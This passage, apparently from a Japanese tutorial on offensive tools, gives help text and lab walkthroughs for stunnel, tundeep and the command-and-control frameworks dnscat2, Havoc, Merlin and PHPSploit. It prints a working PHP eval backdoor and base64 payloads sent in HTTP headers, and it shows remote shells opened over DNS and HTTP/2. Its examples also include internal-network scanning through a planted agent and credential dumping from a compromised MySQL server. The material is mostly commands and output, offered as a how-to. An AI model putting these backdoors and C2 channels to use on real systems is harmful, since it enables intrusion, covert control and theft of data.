verifyPeer = yes|no verify peer certificate
■ 使用例
# ホスト1で証明書チェーンを作成
root@kali_1:~# openssl req -new -x509 -nodes -out stunnel.pem -keyout stunnel.pem
# サーバー設定ファイルを作成
root@kali_1:~# cat > stunnel.conf << EOF
[sshd]
accept = 443
connect = 8443
cert = /root/stunnel.pem
EOF
# Stunnelを起動
root@kali_1:~# stunnel stunnel.conf
[...]
stunnel: LOG5[ui]: Configuration successful
# Netcatを起動(8443番ポートをリッスン)
root@kali_1:~# nc -l 8443
# ホスト2でクライアント設定ファイルを作成
root@kali_2:~# cat > stunnel.conf << EOF
[ssh]
client = yes
accept = 8443
connect = 192.168.11.3:443
EOF
# Stunnelを起動
root@kali_2:~# stunnel stunnel.conf
# Stunnel経由でホスト1の443番ポートに接続
root@kali_2:~# nc 127.0.0.1 8443
# ホスト1の8443番ポートに直接送信した場合は平文のまま
root@kali_2:~# tcpdump -A -n -i eth1
11:30:56.840347 IP 192.168.11.4.58524 > 192.168.11.3.8443: Flags [P.], seq 2742508650:2742508656, ack 1820829686, win 502, options [nop,nop,TS val 1528148926 ecr 3443621137], length 6
E..:..@.@............. ..w\jl.......XV.....
[....A}.hello
# Stunnel経由でホスト1の443番ポートに送信した場合は暗号化される
root@kali_2:~# tcpdump -A -n -i eth1
11:30:08.583128 IP 192.168.11.4.50592 > 192.168.11.3.443: Flags [P.], seq 1944411150:1944411178, ack 1442874660, win 501, options [nop,nop,TS val 1528100666 ecr 3443517308], length 28
E..P..@.@...............s.\.V..$....Xl.....
[..:.?.|..........I.........&....;.^
tundeep
ネットワークトンネリングツールです。レイヤー2のイーサネットプロトコルをサポートしています。
■ 使用方法
root@kali:~# tundeep --help
Usage: tundeep <-i iface|[-t|-T] tapiface> <-h ip> <-p port> [-6] [-C] <-c|-s> [-x tapip] [-y tapmask] [-u tapmac] [-b bpf] [-d udp mode] [-e udp remote] [-K]
-6 IPv6 mode
-C compress mode
-K disable checksum
-a print all pcap devs
-b "bpf"
-i interface to bind to
-h IP to bind to/connect to
-p port to bind to/connect to
-c client mode
-s server mode
-d udp mode
-e udp peer
-t tap interface
-T ipv6 tap interface
-u tap mac
-x if -t mode, set iface ip, if -T mode, set iface ipv6 ip
-y if -t mode, set iface mask, if -T mode, set iface ipv6 prefixlen
■ 使用例
# 標的ホストのインターフェース
root@kali_2:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.56.3 netmask 255.255.255.0 broadcast 192.168.56.255
ether 02:42:ac:13:00:03 txqueuelen 0 (Ethernet)
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.11.4 netmask 255.255.255.0 broadcast 192.168.11.255
ether 00:15:5d:5f:c9:5d txqueuelen 0 (Ethernet)
# 攻撃者ホストで標的ホストのeth1のIPアドレスとMACアドレスを指定してtundeepを5000番ポートで起動
root@kali_1:~# tundeep -s -t tap0 -h 0.0.0.0 -p 5000 -x 192.168.11.4 -y 255.255.255.0 -u 00:15:5d:5f:c9:5d
# 攻撃者ホストにtap0インターフェースが追加される
root@kali_1:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.56.2 netmask 255.255.255.0 broadcast 192.168.56.255
ether 02:42:ac:13:00:02 txqueuelen 0 (Ethernet)
tap0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.11.4 netmask 255.255.255.0 broadcast 192.168.11.255
ether 00:15:5d:5f:c9:5d txqueuelen 1000 (Ethernet)
# 標的ホストで攻撃者ホスト(192.168.56.2)を指定してtundeepを起動(eth1で受信したトラフィックが攻撃者ホストにトンネリングされる)
root@kali_2:~# tundeep -i eth1 -h 192.168.56.2 -p 5000 -c
# 攻撃者ホストから標的ホストの内部ネットワークに対してARPスキャンを実行
root@kali_1:~# arp-scan --interface tap0 --localnet
Interface: tap0, type: EN10MB, MAC: 00:15:5d:5f:c9:5d, IPv4: 192.168.11.4
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.11.1 d4:2c:46:be:0f:60 BUFFALO.INC
192.168.11.2 dc:fb:48:75:75:0b Intel Corporate
192.168.11.3 dc:a2:66:20:35:65 Hon Hai Precision Ind. Co.,Ltd.
# tap0は標的ホストのIPアドレス、MACアドレスを使用しているためターゲット・ネットワーク上に現れない(検出されにくい)
# ただし、標的ホストのトラフィックを妨害する可能性があるため、それを回避する場合はtap0に独自のIPやMACを割り当てる(ターゲット・ネットワーク上に新しいIP/MACが現れる)
root@kali_3:~# arp -n
Address HWtype HWaddress Flags Mask Iface
192.168.11.1 ether d4:2c:46:be:0f:60 C eth0
192.168.11.2 ether dc:fb:48:75:75:0b C eth0
192.168.11.4 ether 00:15:5d:5f:c9:5d C eth1
Command and Control (C2) Framework
dnscat2
DNSプロトコル上に暗号化されたコマンド・アンド・コントロール チャネルを作成します。
■ 使用方法
# サーバー
root@kali:~# dnscat2-server --help
Default host (0.0.0.0) and port (53), with no specific domain:
# ruby dnscat2.rb
Default host/port, with a particular domain to listen on:
# ruby dnscat2.rb domain.com
Or multiple domains:
# ruby dnscat2.rb a.com b.com c.com
If you need to change the address or port it\'s listening on, that
can be done by passing the --dns argument:
# ruby dnscat2.rb --dns 'host=127.0.0.1,port=53531,domain=a.com,domain=b.com'
For other options, see below!
--h, -h: Placeholder for help
--version, -v: Get the dnscat version
--dns, -d <s>: Start a DNS server. Can optionally pass a number of
comma-separated name=value pairs (host, port,
domain). Eg, '--dns
host=0.0.0.0,port=53531,domain=skullseclabs.org' -
'domain' can be passed multiple times
--dnshost, -n <s>: The DNS ip address to listen on [deprecated]
(default: 0.0.0.0)
--dnsport, -s <i>: The DNS port to listen on [deprecated] (default:
53)
--passthrough, -p <s>: Unhandled requests are sent upstream DNS server,
host:port (default: )
--security, -e <s>: Set the security level; 'open' lets the client
choose; 'encrypted' requires encryption (default if
--secret isn\'t set); 'authenticated' requires
encryption and authentication (default if --secret
is set)
--secret, -c <s>: A pre-shared secret, passed to both the client and
server to prevent man-in-the-middle attacks
--auto-command, -a <s>: Send this to each client that connects (default: )
--auto-attach, -u: Automatically attach to new sessions
--packet-trace, -k: Display incoming/outgoing dnscat packets
--process, -r <s>: If set, the given process is run for every incoming
console/exec session and given stdin/stdout. This
has security implications.
--history-size, -i <i>: The number of lines of history that windows will
maintain (default: 1000)
--listener, -l <i>: DEBUG: Start a listener driver on the given port
--firehose, -f: If set, all output goes to stdout instead of being
put in windows.
--help: Show this message
# クライアント
root@kali:~# dnscat --help
Usage: dnscat [args] [domain]
General options:
--help -h This page.
--version Get the version.
--delay <ms> Set the maximum delay between packets (default: 1000).
The minimum is technically 50 for technical reasons,
but transmitting too quickly might make performance
worse.
--steady If set, always wait for the delay before sending.
the next message (by default, when a response is
received, the next message is immediately transmitted.
--max-retransmits <n> Only re-transmit a message <n> times before giving up
and assuming the server is dead (default: 20).
--retransmit-forever Set if you want the client to re-transmit forever
until a server turns up. This can be helpful, but also
makes the server potentially run forever.
--secret Set the shared secret; set the same one on the server
and the client to prevent man-in-the-middle attacks!
--no-encryption Turn off encryption/authentication.
Input options:
--console Send/receive output to the console.
--exec -e <process> Execute the given process and link it to the stream.
--command Start an interactive 'command' session (default).
--ping Simply check if there\'s a dnscat2 server listening.
Debug options:
-d Display more debug info (can be used multiple times).
-q Display less debug info (can be used multiple times).
--packet-trace Display incoming/outgoing dnscat2 packets
Driver options:
--dns <options> Enable DNS mode with the given domain.
domain=<domain> The domain to make requests for.
host=<hostname> The host to listen on (default: 0.0.0.0).
port=<port> The port to listen on (default: 53).
type=<type> The type of DNS requests to use, can use
multiple comma-separated (options: TXT, MX,
CNAME, A, AAAA) (default: TXT,CNAME,MX).
server=<server> The upstream server for making DNS requests
(default: autodetected = 127.0.0.11).
■ 使用例
# ホスト1
# サーバーを起動
root@kali_1:~# dnscat2-server --dns 'host=0.0.0.0,port=53,domain=example.com'
New window created: 0
New window created: crypto-debug
dnscat2> Welcome to dnscat2! Some documentation may be out of date.
auto_attach => false
history_size (for new windows) => 1000
Security policy changed: All connections must be encrypted
New window created: dns1
Starting Dnscat2 DNS server on 0.0.0.0:53
[domains = example.com]...
Assuming you have an authoritative DNS server, you can run
the client anywhere with the following (--secret is optional):
./dnscat --secret=1507062e60429a952e6fe2aa94075363 example.com
To talk directly to the server without a domain name, run:
./dnscat --dns server=x.x.x.x,port=53 --secret=1507062e60429a952e6fe2aa94075363
Of course, you have to figure out <server> yourself! Clients
will connect directly on UDP port 53.
# ホスト2
# サーバーに接続
root@kali_2:~# dnscat --dns server=192.168.11.3,port=53 --secret=1507062e60429a952e6fe2aa94075363
Creating DNS driver:
domain = (null)
host = 0.0.0.0
port = 53
type = TXT,CNAME,MX
server = 192.168.11.3
** Peer verified with pre-shared secret!
Session established!
# ホスト1
# クライアントとのセッションが確立すると対話モードになりサーバーからクライアントへのコマンドが実行可能になる
New window created: 1
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
# コマンドセッションを開始
dnscat2> session -i 1
New window created: 1
history_size (session) => 1000
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a command session!
[...]
# シェルセッションを作成
command (kali_2) 1> shell
Sent request to execute a shell
command (kali_2) 1> New window created: 2
Shell session created!
# シェルセッションを開始
command (kali_2) 1> session -i 2
New window created: 2
history_size (session) => 1000
Session 2 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a console session!
sh (kali_2) 2> hostname
sh (kali_2) 2> kali_2
# クライアント側でtcpdumpを使ってパケットをキャプチャ
root@kali:~# tcpdump -n -i eth0 port 53
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
# TXT/CNAME/MXレコードに対するDNSクエリに偽装してデータの送受信を行っている
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
03:41:53.195196 IP 192.168.11.4.44093 > 192.168.11.3.53: 43573+ TXT? dnscat.2f3a016f52dd8c94e98fe70036e2f64773. (59)
03:41:53.197128 IP 192.168.11.3.53 > 192.168.11.4.44093: 43573 1/0/0 TXT "94e3016f523e994869fa84ffff5a885679" (106)
03:41:54.208397 IP 192.168.11.4.44093 > 192.168.11.3.53: 64826+ CNAME? dnscat.1f3d016f5228771e0cedf30037bf5fa797. (59)
03:41:54.210195 IP 192.168.11.3.53 > 192.168.11.4.44093: 64826 1/0/0 CNAME dnscat.8ca8016f5274bde7938e5affff5a885679. (114)
03:41:55.221575 IP 192.168.11.4.44093 > 192.168.11.3.53: 60799+ CNAME? dnscat.130a016f5293bbfc000f2c00387c21ec80. (59)
03:41:55.223130 IP 192.168.11.3.53 > 192.168.11.4.44093: 60799 1/0/0 CNAME dnscat.c599016f520243110731cdffff5a885679. (114)
03:41:56.234294 IP 192.168.11.4.44093 > 192.168.11.3.53: 29702+ TXT? dnscat.1b56016f527b3274a67cb40039dd60a349. (59)
03:41:56.235843 IP 192.168.11.3.53 > 192.168.11.4.44093: 29702 1/0/0 TXT "d44e016f5240a6a8c9f9e0ffff5a885679" (106)
03:41:57.245968 IP 192.168.11.4.44093 > 192.168.11.3.53: 52735+ MX? dnscat.a0a3016f528940f6f686a6003ab56046db. (59)
03:41:57.247653 IP 192.168.11.3.53 > 192.168.11.4.44093: 52735 1/0/0 MX dnscat.0d6d016f52493e55490b07ffff5a885679. 10 (116)
03:41:58.257349 IP 192.168.11.4.44093 > 192.168.11.3.53: 14940+ CNAME? dnscat.24fe016f52e71a8a720e16003bc8afe63d. (59)
03:41:58.258412 IP 192.168.11.3.53 > 192.168.11.4.44093: 14940 1/0/0 CNAME dnscat.64cd016f52d8fdbb09db8dffff5a885679. (114)
03:41:59.266634 IP 192.168.11.4.44093 > 192.168.11.3.53: 20216+ CNAME? dnscat.7506016f52206478418ced003cb04af50f. (59)
Havoc
カスタマイズ可能なコマンド・アンド・コントロール チャネルを作成します。
■ 使用方法
# サーバー
root@kali:~# havoc server --help
teamserver command
Usage:
havoc server [flags]
Flags:
--profile string set havoc teamserver profile
--debug enable debug mode
--debug-dev enable debug mode for developers (compiles the agent with the debug mode/macro enabled)
--send-logs the agent will send logs over http(s) to the teamserver
-d, --default uses default profile (overwrites --profile)
-v, --verbose verbose messages
-h, --help help for server
# クライアント
root@kali:~# havoc client --help
client command
Usage:
havoc client [flags]
Flags:
-h, --help help for client
■ 使用例
# サーバーを起動
root@kali:~# havoc server --profile /usr/share/havoc/profiles/havoc.yaotl
[INFO] Havoc Framework [Version: 0.7] [CodeName: Bites The Dust]
[INFO] Havoc profile: /usr/share/havoc/profiles/havoc.yaotl
[INFO] Build:
- Compiler x64 : /usr/bin/x86_64-w64-mingw32-gcc
- Compiler x86 : /usr/bin/i686-w64-mingw32-gcc
- Nasm : /usr/bin/nasm
[INFO] Time: 13/10/2024 05:07:59
[INFO] Teamserver logs saved under: /root/.havoc/data/loot/2024.10.13._05:07:59
[INFO] Starting Teamserver on wss://0.0.0.0:40056
[INFO] [SERVICE] starting service handle on wss://0.0.0.0:40056/service-endpoint
[INFO] Opens existing database: /root/.havoc/data/teamserver.db
[...]
root@kali:~# havoc client
QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-root'
[05:08:54] [info] Havoc Framework [Version: 0.7] [CodeName: Bites The Dust]
[05:08:54] [info] Successful created database
[05:08:54] [info] loaded config file: client/config.toml
[...]
havoc clientコマンドを実行すると下図のクライアント画面が起動
httpリスナー(エージェントとの通信チャネル)を追加
ペイロードの作成(ローカルディスクにデーモンエージェントをコンパイル)
標準ではWindows用エージェントしか用意されていないため3rdパーティのLinuxエージェントを使用しています。
作成したエージェントをターゲットホストに配置して実行。サーバーとのセッションを確立
サーバーからエージェントに対してシェルの実行をリクエスト
Merlin
マルチユーザーモードを搭載し、HTTP/1.1、HTTP/2、HTTP/3上でコマンド・アンド・コントロール チャネルを作成します。
■ 使用方法
# gRPCサーバー
root@kali:~# merlinServer --help
Usage of merlinServer:
-addr string
The address to listen on for client connections (default "127.0.0.1:50051")
-debug
Enable debug logging
-extra
Enable extra debug logging
-password string
the password to for CLI RPC clients to connect to this server (default "merlin")
-secure
Require client TLS certificate verification
-tlsCA string
TLS Certificate Authority file path to verify client certificates
-tlsCert string
TLS certificate file path
-tlsKey string
TLS private key file path
-trace
Enable trace logging
-version
Print the version number and exit
# サーバー操作用CLI
root@kali:~# merlinCLI --help
Usage of merlinCLI:
-addr string
The address of the Merlin server to connect to (default "127.0.0.1:50051")
-password string
the password to connect to the Merlin server (default "merlin")
-secure
Require server TLS certificate verification
-tlsCA string
TLS Certificate Authority file path
-tlsCert string
TLS certificate file path
-tlsKey string
TLS private key file path
-version
Print the version number and exit
# エージェント
root@kali:~# merlinAgent --help
Merlin Agent
-addr string
The address in interface:port format the agent will use for communications (default "127.0.0.1:4444")
-auth string
The Agent\'s authentication method (e.g, OPAQUE (default "opaque")
-debug
Enable debug output
-headers string
A new line separated (e.g., \n) list of additional HTTP headers to use
-host string
HTTP Host header
-http-client string
The HTTP client to use for communication [go, winhttp] (default "go")
-ja3 string
JA3 signature string (not the MD5 hash). Overrides -proto & -parrot flags
-killdate string
The date, as a Unix EPOCH timestamp, that the agent will quit running (default "0")
-listener string
The uuid of the peer-to-peer listener this agent should connect to
-maxretry string
The maximum amount of failed checkins before the agent will quit running (default "7")
-padding string
The maximum amount of data that will be randomly selected and appended to every message (default "4096")
-parrot string
parrot or mimic a specific browser from github.com/refraction-networking/utls (e.g., HelloChrome_Auto)
-proto string
Protocol for the agent to connect with [https (HTTP/1.1), http (HTTP/1.1 Clear-Text), h2 (HTTP/2), h2c (HTTP/2 Clear-Text), http3 (QUIC or HTTP/3.0), tcp-bind, tcp-reverse, udp-bind, udp-reverse, smb-bind, smb-reverse] (default "h2")
-proxy string
Hardcoded proxy to use for http/1.1 traffic only that will override host configuration
-proxy-pass string
Password for proxy authentication
-proxy-user string
Username for proxy authentication
-psk string
Pre-Shared Key used to encrypt initial communications (default "merlin")
-secure string
Require TLS certificate validation for HTTP communications (default "false")
-skew string
Amount of skew, or variance, between agent checkins (default "3000")
-sleep string
Time for agent to sleep (default "30s")
-transforms string
Ordered CSV of transforms to construct a message (default "jwe,gob-base")
-url string
A comma separated list of the full URLs for the agent to connect to (default "https://127.0.0.1:443")
-useragent string
The HTTP User-Agent header string that the Agent will use while sending traffic (default "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36")
-v Enable verbose output
-version
Print the agent version and exit
■ 使用例
# サーバー起動
root@kali_srv:~# merlinServer
{"time":"2024-10-23T02:04:36.099747089Z","level":"INFO","msg":"Created new TLS certificate","Serial":210820309662697702526355408769238977508,"Subject":["Merlin"],"NotBefore":"2024-10-23T02:04:36.08753054Z","NotAfter":"2025-10-29T02:04:36.08753064Z"}
[...]
# サーバーにCLIで接続
root@kali_srv:~# merlinCLI
[+] 2024-10-23T02:05:52Z Successfully connected to Merlin server at 127.0.0.1:50051
Merlin»
# リスナー(エージェントとの通信チャネル)を作成
Merlin» listeners
Merlin[listeners]»use HTTP2
Merlin[listeners][HTTP2]»set Name Evil-Ch
Merlin[listeners][HTTP2]»run
[+] 2024-10-23T02:13:23Z Started 'Evil-Ch' listener with an ID of 9407c468-9da4-4a81-8360-2b6f496eeb73 and a HTTP2 server on 127.0.0.1:443
Merlin[listeners][9407c468-9da4-4a81-8360-2b6f496eeb73]»
# エージェントからサーバーのHTTP2リスナーに接続
root@kali_ag:~# merlinAgent -proto h2 -url https://192.168.11.3:443
Merlin[listeners][9407c468-9da4-4a81-8360-2b6f496eeb73]»
[+] 2024-10-23T02:15:37Z New authenticated Agent checkin for ddd2a8b1-0a35-48a8-85d0-2eb4672a9886 at 2024-10-23T02:15:37Z
[-] 2024-10-23T02:16:09Z Results of job TXncsWAlxT for agent ddd2a8b1-0a35-48a8-85d0-2eb4672a9886 at 2024-10-23T02:16:09Z
Configuration data received for Agent ddd2a8b1-0a35-48a8-85d0-2eb4672a9886 and updated. Issue the "info" command to view it
# エージェントとの対話を開始
Merlin[listeners][9407c468-9da4-4a81-8360-2b6f496eeb73]»interact ddd2a8b1-0a35-48a8-85d0-2eb4672a9886
# エージェント側ホストのインターフェース情報を取得
Merlin[agent][ddd2a8b1-0a35-48a8-85d0-2eb4672a9886]»ifconfig
Merlin[agent][ddd2a8b1-0a35-48a8-85d0-2eb4672a9886]»
[-] 2024-10-23T02:25:17Z Created job yeATAfPyFZ for agent ddd2a8b1-0a35-48a8-85d0-2eb4672a9886 at 2024-10-23T02:25:17Z
[-] 2024-10-23T02:26:13Z Results of job yeATAfPyFZ for agent ddd2a8b1-0a35-48a8-85d0-2eb4672a9886 at 2024-10-23T02:26:13Z
[+] 2024-10-23T02:26:13Z lo
MAC Address
IP Address 127.0.0.1/8
eth1
MAC Address 02:42:ac:12:00:02
IP Address 192.168.65.2/24
eth0
MAC Address 02:42:ac:13:00:03
IP Address 192.168.11.4/24
# エージェント側ホストの内部ネットワークに対してポートスキャンを実行
Merlin[agent][ddd2a8b1-0a35-48a8-85d0-2eb4672a9886]» shell nmap -v -n 192.168.65.0/24 -T4 --unprivileged
Merlin[agent][ddd2a8b1-0a35-48a8-85d0-2eb4672a9886]»
[-] 2024-10-23T02:34:54Z Created job LwIViqGiVy for agent ddd2a8b1-0a35-48a8-85d0-2eb4672a9886 at 2024-10-23T02:34:54Z
[-] 2024-10-23T02:35:36Z Results of job LwIViqGiVy for agent ddd2a8b1-0a35-48a8-85d0-2eb4672a9886 at 2024-10-23T02:35:36Z
[+] 2024-10-23T02:35:36Z Created /bin/sh process with an ID of 318
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-23 02:35 UTC
Initiating Ping Scan at 02:35
Scanning 256 hosts [2 ports/host]
Completed Ping Scan at 02:35, 3.01s elapsed (256 total hosts)
[...]
Nmap scan report for 192.168.65.1
Host is up (0.00027s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
111/tcp open rpcbind
8080/tcp open http-proxy
Nmap scan report for 192.168.65.2
Host is up (0.00030s latency).
All 1000 scanned ports on 192.168.11.3 are in ignored states.
Not shown: 1000 closed tcp ports (conn-refused)
Nmap scan report for 192.168.65.3
Host is up (0.00032s latency).
Not shown: 979 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
Read data files from: /usr/share/nmap
Nmap done: 256 IP addresses (3 hosts up) scanned in 3.04 seconds
PHPSPLOIT
標的のWebサーバー上にPHPのバックドアスクリプトを配置してコマンド・アンド・コントロール チャネルを作成します。
■ 使用方法
root@kali:~# phpsploit --help
usage: phpsploit [-h] [-v] [-c <FILE>] [-l <SESSION>] [-t <URL>] [-s <FILE>] [-e <CMD>] [-i]
options:
-h, --help show this help message and exit
-v, --version output version information and exit
-c <FILE>, --config <FILE> use alternative configuration file
-l <SESSION>, --load <SESSION> load session file
-t <URL>, --target <URL> set remote TARGET URL
-s <FILE>, --source <FILE> run commands from file (disables interactive mode)
-e <CMD>, --eval <CMD> run phpsploit command (disables interactive mode)
-i, --interactive force interactive mode if unset by `-e` or `-s`
■ 使用例
標的のWebサーバーに以下のバックドアスクリプトを配置
backdoor.php
<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>
# インタラクティブモードで起動
root@kali:~# phpsploit
# 標的のWebサーバーに設置したバックドアのURLを指定
phpsploit > set TARGET http://192.168.11.4/backdoor.php
# 標的のWebサーバーのバックドアスクリプトを起動
phpsploit > exploit
[*] Current backdoor is: <?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>
[*] Sending payload to http://192.168.11.4/backdoor.php ...
[*] Shell obtained by PHP (192.168.11.3 -> 192.168.11.4)
Connected to Linux server (192.168.11.4)
running PHP 5.2.4-2ubuntu5.10 on Apache/2.2.8 (Ubuntu) DAV/2
phpsploit(192.168.11.4) >
# 標的のWebサーバー上のMySQLに接続
phpsploit(192.168.11.4) > mysql connect root@127.0.0.1
[*] SUCCESS: Access granted for user 'root'@'127.0.0.1' (using password: NO)
# データベースの一覧を表示
phpsploit(192.168.11.4) > mysql show databases
+--------------------+
| Database |
+--------------------+
| information_schema |
| dvwa |
| metasploit |
| mysql |
| owasp10 |
| tikiwiki |
| tikiwiki195 |
+--------------------+
7 rows in set (0.03 sec)
# データベースに接続
phpsploit(192.168.11.4) > mysql use tikiwiki
[*] Database changed
# テーブル一覧を表示
phpsploit(192.168.11.4) > mysql show tables
+------------------------------------+
| Tables_in_tikiwiki |
+------------------------------------+
| galaxia_activities |
| galaxia_activity_roles |
[...]
| users_usergroups |
| users_users |
+------------------------------------+
# SQLを実行
phpsploit(192.168.11.4) > mysql select login,password from users_users
+-------+----------+
| login | password |
+-------+----------+
| admin | admin |
+-------+----------+
1 row in set (0.11 sec)
PHPのコードをbase64エンコードしてHTTPヘッダーでバックドアスクリプトに送信することでリモート操作を行っている
# phpsploitでlsを実行した時のダンプ
root@kali:~# tcpdump -A -i eth0
GET /backdoor.php HTTP/1.1
Accept-Encoding: identity
Phpspl01T: eval(base64_decode('JHM9JF9TRVJWRVI7a3NvcnQoJHMpOyR4PSIiO2ZvcmVhY2goJHMgYXMgJGE9PiRiKWlmKHN1YnN0cigkYSwwLDcpPT0nSFRUUF9aWicpJHguPSRiO2V2YWwoYmFzZTY0X2RlY29kZSgiJHgiKSk7'));
Zzaa: ZWNobyAiNjA3Njg2ZjYtODFmYS00Y2JmLWJkNjUtNzkzZDI2MjZkMDAyIjskb3JpZ19jb25mID0gaW5pX2dldF9hbGwoKTsKZm9yZWFjaCAoJG9yaWdfY29uZiBhcyAka2V5ID0+ICR2YWwpCnsKaWYgKCR2YWxbImFjY2VzcyJdICYgMSkKJG9yaWdfY29uZlska2V5XSA9ICR2YWxbImxvY2FsX3ZhbHVlIl07CmVsc2UKdW5zZXQoJG9yaWdfY29uZlska2V5XSk7Cn0KaW5pX3NldCgnZGlzcGxheV9lcnJvcnMnLCAnMScpOwppbmlfc2V0KCdlcnJvcl9yZXBvcnRpbmcnLCBFX0FMTCBeIChFX05PVElDRSB8IEVfV0FSTklORykpOwokUEhQU1BMT0lUID0gYXJyYXkoKTsKZnVuY3Rpb24gZXJyb3IoJGE9JycsICRiPUZhbHNlLCAkYz1GYWxzZSwgJGQ9RmFsc2UsICRlPUZhbHNlKQp7CnJldHVybiAoYXJyYXkoJ19fRVJST1JfXycgPT4gc3ByaW50ZigkYSwgJGIsICRjLCAkZCwgJGUpKSk7Cn0KZnVuY3Rpb24
Zzab: gcGF5bG9hZCgpCnsKZ2xvYmFsICRQSFBTUExPSVQ7JFBIUFNQTE9JVD11bnNlcmlhbGl6ZShiYXNlNjRfZGVjb2RlKCJZVG8wT250ek9qZzZJbEJCVkVoZlUwVlFJanR6T2pFNklpOGlPM002TmpvaVZFRlNSMFZVSWp0ek9qZzZJaTkyWVhJdmQzZDNJanR6T2prNklsTkZVRUZTUVZSUFVpSTdjem94T2lJdklqdHpPalU2SWxCQlVsTkZJanRwT2pBN2ZRPT0iKSk7CmZ1bmN0aW9uIGdldE93bmVyKCRhYnNwYXRoKQp7CmlmIChmdW5jdGlvbl9leGlzdHMoJ3Bvc2l4X2dldHB3dWlkJykpCnsKJHVpZCA9IEBmaWxlZ3JvdXAoJGFic3BhdGgpOwokdXNyID0gQHBvc2l4X2dldHB3dWlkKCR1aWQpOwppZiAoQGlzX3N0cmluZygkdXNyWyduYW1lJ10pICYmICFAZW1wdHkoJHVzclsnbmFtZSddKSkKcmV0dXJuICgkdXNyWyduYW1lJ10pOwp9CnJldHVybiAoIj8iKTsKfQpmdW5jdGlvbiBnZXRHcm91cCgkYWJzcG
Zzac: F0aCkKewppZiAoZnVuY3Rpb25fZXhpc3RzKCdwb3NpeF9nZXRncmdpZCcpKQp7CiRnaWQgPSBAZmlsZWdyb3VwKCRhYnNwYXRoKTsKJGdycCA9IEBwb3NpeF9nZXRncmdpZCgkZ2lkKTsKaWYgKEBpc19zdHJpbmcoJGdycFsnbmFtZSddKSAmJiAhQGVtcHR5KCRncnBbJ25hbWUnXSkpCnJldHVybiAoJGdycFsnbmFtZSddKTsKfQpyZXR1cm4gKCI/Iik7Cn0KZnVuY3Rpb24gZ2V0TVRpbWUoJGFic3BhdGgsICRkYXRlX2ZtdCkKewokbXRpbWUgPSBAZmlsZW10aW1lKCRhYnNwYXRoKTsKJHJlc3VsdCA9IEBkYXRlKCRkYXRlX2ZtdCwgJG10aW1lKTsKcmV0dXJuICgkcmVzdWx0KTsKfQpmdW5jdGlvbiBjYW5fY2hhbmdlX210aW1lKCRwYXRoKQp7CiRvbGRfbXRpbWUgPSBAZmlsZW10aW1lKCRwYXRoKTsKJG9sZF9hdGltZSA9IEBmaWxlYXRpbWUoJHBhdGgpOwpyZXR1cm4gQHRvdWNoKCRwYXRoLCAkb2xkX
Zzad: 210aW1lLCAkb2xkX2F0aW1lKTsKfQpmdW5jdGlvbiBmaWxlQWNjZXNzKCRhYnNwYXRoLCAkbW9kZSkKewppZiAoJG1vZGUgIT0gJ3InICYmICRtb2RlICE9ICd4JykKJG1vZGUgPSAnYSc7CmlmICgkbW9kZSA9PSAneCcpCnJldHVybiBAaXNfZXhlY3V0YWJsZSgkYWJzcGF0aCk7CiRvbGRfbXRpbWUgPSBAZmlsZW10aW1lKCRhYnNwYXRoKTsKJG9sZF9hdGltZSA9IEBmaWxlYXRpbWUoJGFic3BhdGgpOwppZiAoJGggPSBAZm9wZW4oJGFic3BhdGgsICRtb2RlKSkKewpmY2xvc2UoJGgpOwpAdG91Y2goJGFic3BhdGgsICRvbGRfbXRpbWUsICRvbGRfYXRpbWUpOwpyZXR1cm4gKFRydWUpOwp9CmVsc2UKcmV0dXJuIChGYWxzZSk7Cn0KZnVuY3Rpb24gZGlyQWNjZXNzKCRhYnNwYXRoLCAkbW9kZSkKewppZiAoJG1vZGUgPT0gJ3InKQp7CmlmICgkaCA9IEBvcGVuZGlyKCRhYnNwYXRoKSkKewpjbG9zZWRp
